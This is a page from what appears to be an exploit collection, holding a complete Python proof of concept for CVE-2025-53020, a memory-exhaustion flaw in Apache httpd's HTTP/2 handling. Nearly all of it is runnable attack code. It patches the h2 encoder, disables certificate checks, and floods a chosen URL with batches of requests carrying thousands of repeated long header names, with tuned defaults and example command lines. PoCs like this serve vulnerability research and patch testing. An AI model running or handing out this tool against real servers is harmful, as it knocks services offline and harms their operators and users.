4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
import h2.connection
import socket
import time
import tqdm
import argparse
import ssl
from urllib.parse import urlparse
import struct


class H2Attacker:
    """HTTP/2 client for testing memory exhaustion vulnerabilities in Apache httpd.

    The instance owns one TCP (optionally TLS) socket and one ``h2`` connection
    state machine. Call :meth:`connect` before sending anything and
    :meth:`close` (or use the instance as a context manager) when done.
    """

    # Default TCP port for each URL scheme this client can speak.
    _DEFAULT_PORTS = {'http': 80, 'https': 443}

    def __init__(self, url):
        """Initialize the attacker with target URL.

        Args:
            url (str): Target URL (e.g., 'https://example.com/path')

        Raises:
            ValueError: If the URL has no host, has an invalid port, or uses a
                scheme other than ``http`` / ``https``.
        """
        parsed_url = urlparse(url)
        self.protocol = parsed_url.scheme
        self.host = parsed_url.hostname
        self.path = parsed_url.path or '/'

        # Validate required components
        if not self.host:
            raise ValueError(f"Invalid URL: {url}. Host is required.")
        if self.protocol not in self._DEFAULT_PORTS:
            # Without this check any other scheme would silently be treated as
            # plaintext on port 80 and sent verbatim as the ':scheme' header.
            raise ValueError(
                f"Invalid URL: {url}. Scheme must be 'http' or 'https'."
            )

        self.port = parsed_url.port or self._DEFAULT_PORTS[self.protocol]

        # Connection objects
        self.socket = None
        self.http2_connection = None

        # Create pseudo headers from URL components
        self.pseudo_headers = self._create_pseudo_headers()
        self.default_headers = self.pseudo_headers.copy()

    def __enter__(self):
        """Return the instance itself; the caller still calls :meth:`connect`."""
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Close the connection when leaving a ``with`` block."""
        self.close()

    def _create_pseudo_headers(self):
        """Create HTTP/2 pseudo headers from URL components.

        Returns:
            list: List of pseudo header tuples
        """
        return [
            (':method', 'GET'),
            (':path', self.path),
            (':authority', self.host),
            (':scheme', self.protocol)
        ]

    def _require_connection(self):
        """Return the active h2 connection.

        Raises:
            RuntimeError: If :meth:`connect` has not completed successfully.
        """
        if self.http2_connection is None:
            raise RuntimeError("HTTP/2 connection not established")
        return self.http2_connection

    def connect(self):
        """Establish HTTP/2 connection to the target server.

        Raises:
            ConnectionError: If any step (TCP connect, TLS setup, HTTP/2
                preface, encoder patch) fails. The original exception is
                chained as ``__cause__`` and any socket opened so far is
                closed before raising.
        """
        try:
            # Create socket connection
            self.socket = socket.create_connection((self.host, self.port))
            # Set SO_LINGER to 5 seconds to ensure graceful shutdown with FIN
            self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack('ii', 1, 5))

            # Setup TLS if HTTPS
            if self.protocol == 'https':
                self._setup_tls()

            # Initialize HTTP/2 connection
            self.http2_connection = h2.connection.H2Connection()
            self.http2_connection.initiate_connection()
            self.socket.sendall(self.http2_connection.data_to_send())

            # Apply the encoder patch for empty values
            self._patch_encoder_for_empty_values()

        except Exception as e:
            # Do not leave a half-initialised socket behind on failure.
            self.close()
            raise ConnectionError(f"Failed to connect to {self.host}:{self.port}: {e}") from e

    def close(self):
        """Close the socket and drop the HTTP/2 state. Safe to call repeatedly."""
        sock, self.socket = self.socket, None
        self.http2_connection = None
        if sock is None:
            return
        try:
            sock.close()
        except OSError:
            # Best-effort teardown: the peer may already have gone away.
            pass

    def _setup_tls(self):
        """Setup TLS connection with HTTP/2 ALPN.

        Certificate and hostname verification are disabled on purpose so that
        test servers with self-signed certificates can be reached.
        """
        context = ssl.create_default_context()
        # check_hostname must be cleared before verify_mode can be CERT_NONE.
        context.check_hostname = False
        context.verify_mode = ssl.CERT_NONE
        # Set ALPN to negotiate HTTP/2
        context.set_alpn_protocols(['h2'])
        # Wrap socket with TLS
        self.socket = context.wrap_socket(self.socket, server_hostname=self.host)
        # Ensure SSL handshake completes
        self.socket.do_handshake()

    def _patch_encoder_for_empty_values(self):
        """Patch the h2 encoder to fix empty value indexing bug.

        Replaces the encoder's ``add`` method on this connection only. The
        replacement treats a header-table match as a perfect match whenever
        the third element of the match is not ``None`` (rather than merely
        truthy), so a match carrying an empty value is emitted as an indexed
        field.

        NOTE(review): this relies on the private encoder methods
        ``_encode_indexed`` and ``_encode_indexed_literal``; confirm they
        still exist when upgrading the HPACK dependency.

        Raises:
            RuntimeError: If the HTTP/2 connection has not been created yet.
        """
        encoder = self._require_connection().encoder
        original_add = encoder.add

        def patched_add(to_add, sensitive, huffman=False):
            name, value = to_add

            # Set indexing mode
            indexbit = b'\x40' if not sensitive else b'\x10'  # INDEX_INCREMENTAL or INDEX_NEVER

            # Search for matching header
            match = encoder.header_table.search(name, value)

            if match is None:
                # Not in table - use original logic
                return original_add(to_add, sensitive, huffman)

            # Header is in table
            index, _found_name, found_value = match

            # Fix: Check if found_value is not None (perfect match) instead of truthy
            if found_value is not None:
                # Perfect match - use indexed encoding
                return encoder._encode_indexed(index)

            # Name-only match - use indexed literal
            encoded = encoder._encode_indexed_literal(index, value, indexbit, huffman)
            if not sensitive:
                encoder.header_table.add(name, value)
            return encoded

        # Replace the add method
        encoder.add = patched_add

    def set_default_headers(self, additional_headers):
        """Set default headers by combining pseudo headers with additional headers.

        Args:
            additional_headers (iterable): Additional header tuples; any
                iterable is accepted, not only a list.
        """
        self.default_headers = [*self.pseudo_headers, *additional_headers]

    def send_headers(self, headers, add_pseudo_headers=True):
        """Send HTTP/2 headers for a single request.

        Args:
            headers (list): List of header tuples
            add_pseudo_headers (bool): Whether to prepend pseudo headers

        Raises:
            RuntimeError: If the HTTP/2 connection is not established.
        """
        connection = self._require_connection()

        if add_pseudo_headers:
            headers = [*self.pseudo_headers, *headers]

        stream_id = connection.get_next_available_stream_id()
        connection.send_headers(stream_id, headers, end_stream=True)
        self.socket.sendall(connection.data_to_send())

    def send_default_headers(self):
        """Send a request using the default headers.

        Raises:
            ValueError: If the default header list is empty.
            RuntimeError: If the HTTP/2 connection is not established.
        """
        if not self.default_headers:
            raise ValueError("Default headers are not set")
        self.send_headers(self.default_headers, add_pseudo_headers=False)

    def add_headers_to_batch(self, headers):
        """Add headers to batch without sending immediately.

        The stream is opened with ``end_stream=False`` and the encoded frames
        stay buffered in the h2 connection until :meth:`send_batch` is called.

        Args:
            headers (list): List of header tuples

        Raises:
            RuntimeError: If the HTTP/2 connection is not established.
        """
        connection = self._require_connection()
        stream_id = connection.get_next_available_stream_id()
        connection.send_headers(stream_id, headers, end_stream=False)

    def send_batch(self):
        """Send all batched headers.

        Raises:
            RuntimeError: If the HTTP/2 connection is not established.
        """
        connection = self._require_connection()
        self.socket.sendall(connection.data_to_send())

    @staticmethod
    def create_repeated_header_name_headers(header_name_length=4000, header_reps=1000, char_to_repeat='a'):
        """Create headers with repeated long header names.

        Args:
            header_name_length (int): Length of the header name
            header_reps (int): Number of times to repeat the header
            char_to_repeat (str): Character to use for the header name

        Returns:
            list: ``header_reps`` copies of one ``(name, '')`` tuple, where
            ``name`` is ``char_to_repeat`` repeated ``header_name_length`` times.
        """
        header_name = char_to_repeat * header_name_length
        return [(header_name, '')] * header_reps

    def run_attack_with_headers(self, headers, requests_per_batch, num_batches, delay_between_batches=0):
        """Run the memory exhaustion attack with specified headers.

        Args:
            headers (list): Headers to use for the attack
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        print(f"Starting attack: {num_batches} batches of {requests_per_batch} requests each")

        for _batch in tqdm.tqdm(range(num_batches), desc="Sending batches"):
            for _request in range(requests_per_batch):
                self.add_headers_to_batch(headers)
            self.send_batch()

            if delay_between_batches > 0:
                time.sleep(delay_between_batches)

    def run_attack_with_default_headers(self, requests_per_batch, num_batches, delay_between_batches=0):
        """Run attack using the default headers.

        Args:
            requests_per_batch (int): Number of requests to send per batch
            num_batches (int): Number of batches to send
            delay_between_batches (float): Delay in seconds between batches
        """
        self.run_attack_with_headers(
            self.default_headers, requests_per_batch, num_batches, delay_between_batches
        )


def run_memory_exhaustion_attack(url, header_name_length, header_reps, requests_per_batch, 
                                num_batches, delay_between_batches=0, num_headers_to_repeat=1):
    """Run the memory exhaustion attack against Apache httpd.

    Connects to the target, sends one priming request carrying a single long
    header name, then sends the configured batches of requests and finally
    waits five seconds before closing the socket.

    Args:
        url (str): Target URL
        header_name_length (int): Length of repeated header names
        header_reps (int): Number of header repetitions per request
        requests_per_batch (int): Number of requests per batch
        num_batches (int): Number of batches to send
        delay_between_batches (float): Delay between batches in seconds
        num_headers_to_repeat (int): Number of different header names to create
            using different characters; must be between 1 and 26.

    Raises:
        ValueError: If ``num_headers_to_repeat`` is outside 1..26, or the URL
            is rejected by ``H2Attacker``.
        ConnectionError: If the connection cannot be established.
    """
    # Header names are built from consecutive characters starting at 'a'.
    # Past 'z' the generated characters are no longer lowercase letters, and
    # below 1 no header names would be generated at all.
    if not 1 <= num_headers_to_repeat <= 26:
        raise ValueError(
            f"num_headers_to_repeat must be between 1 and 26, got {num_headers_to_repeat}"
        )

    print(f"Targeting: {url}")
    print(f"Header name length: {header_name_length}")
    print(f"Header repetitions: {header_reps}")
    print(f"Number of different header names: {num_headers_to_repeat}")

    # Initialize attacker
    attacker = H2Attacker(url)
    attacker.connect()

    try:
        # First, send an initial request to add the header to HPACK table
        print("Sending initial request to populate HPACK table...")
        initial_headers = H2Attacker.create_repeated_header_name_headers(
            header_name_length=header_name_length, header_reps=1
        )
        attacker.send_headers(initial_headers)

        # Prepare attack headers with different character patterns
        print("Preparing attack headers...")
        attack_headers = []
        for offset in range(num_headers_to_repeat):
            attack_headers.extend(
                H2Attacker.create_repeated_header_name_headers(
                    header_name_length=header_name_length,
                    header_reps=header_reps,
                    char_to_repeat=chr(ord('a') + offset),
                )
            )

        # Set as default headers and run attack
        attacker.set_default_headers(attack_headers)
        attacker.run_attack_with_default_headers(
            requests_per_batch=requests_per_batch,
            num_batches=num_batches,
            delay_between_batches=delay_between_batches
        )

        print("Attack completed. Waiting for server response...")
        time.sleep(5)
    finally:
        # Release the socket even when a send fails part-way through.
        if attacker.socket is not None:
            attacker.socket.close()


def main():
    """Parse command-line options, validate them and run the PoC.

    Validation failures and runtime errors are reported on standard output.

    Returns:
        int: 0 on success, 1 when an option is out of range or the run raises.
    """
    parser = argparse.ArgumentParser(
        description='''HTTP/2 Memory Exhaustion PoC for Apache httpd

This tool exploits CVE-2025-53020 in Apache httpd by sending HTTP/2 requests with repetitive long header names,
which takes advantage of unnecessary memory duplication for header names.

The attack works by:
1. Creating long header names (--header-name-length) to maximize memory consumption
2. Optionally creating multiple distinct header names (--num-headers-to-repeat) using different characters (a, b, c, etc.)
3. Sending batches of requests (--batches) where:
   - Each request contains multiple repetitions of the header names (--header-reps)
   - Multiple requests can be sent per batch (--requests-per-batch)
   - Optional delays between batches can be configured (--delay)
4. The server allocates memory for each header name occurrence, leading to memory exhaustion

Example usage:
    python poc.py --url https://target.com/api/endpoint
    python poc.py --url http://localhost:8080/test --header-reps 1000
    python poc.py --url https://target.com --num-headers-to-repeat 3 --header-name-length 4000
        ''',
        formatter_class=argparse.RawDescriptionHelpFormatter
    )

    parser.add_argument('--url', required=True, 
                       help='Target URL (e.g., https://example.com/path)')
    parser.add_argument('--header-name-length', type=int, default=4064, 
                       help='Length of header name (default: 4064)')
    parser.add_argument('--header-reps', type=int, default=2063, 
                       help='Number of header repetitions per request (default: 2063)')
    parser.add_argument('--requests-per-batch', type=int, default=1, 
                       help='Number of requests per batch (default: 1)')
    parser.add_argument('--batches', type=int, default=100, 
                       help='Number of batches (default: 100)')
    parser.add_argument('--delay', type=float, default=0, 
                       help='Delay between batches in seconds (default: 0)')
    parser.add_argument('--num-headers-to-repeat', type=int, default=1, 
                       help='Number of different header names to create (default: 1)')

    args = parser.parse_args()

    # With multiple header names a single request per batch is recommended
    # (warning only), and the name length is capped at 4000 (hard error).
    if args.num_headers_to_repeat != 1:
        if args.requests_per_batch != 1:
            print("Warning: When using multiple header names > 1, requests per batch is recommended to be 1")
        if args.header_name_length > 4000:
            # The limit is inclusive: exactly 4000 is accepted.
            print("ERROR: When using multiple header names > 1, header name length should be at most 4000")
            return 1

    if args.header_name_length > 4064:
        # The limit is inclusive: the default of 4064 is accepted.
        print("ERROR: Header name length should be at most 4064")
        return 1

    if args.header_reps > 2063:
        print("Warning: Header reps should be at most 2063")

    try:
        run_memory_exhaustion_attack(
            url=args.url,
            header_name_length=args.header_name_length,
            header_reps=args.header_reps,
            requests_per_batch=args.requests_per_batch,
            num_batches=args.batches,
            delay_between_batches=args.delay,
            num_headers_to_repeat=args.num_headers_to_repeat
        )
    except Exception as e:
        # Top-level boundary: report the failure and signal it via exit code.
        print(f"Error: {e}")
        return 1

    return 0


if __name__ == "__main__":
    # The bare `exit` helper is injected by the `site` module for interactive
    # sessions and is missing under `python -S` or in frozen builds; raising
    # SystemExit propagates main()'s return code without relying on it.
    raise SystemExit(main())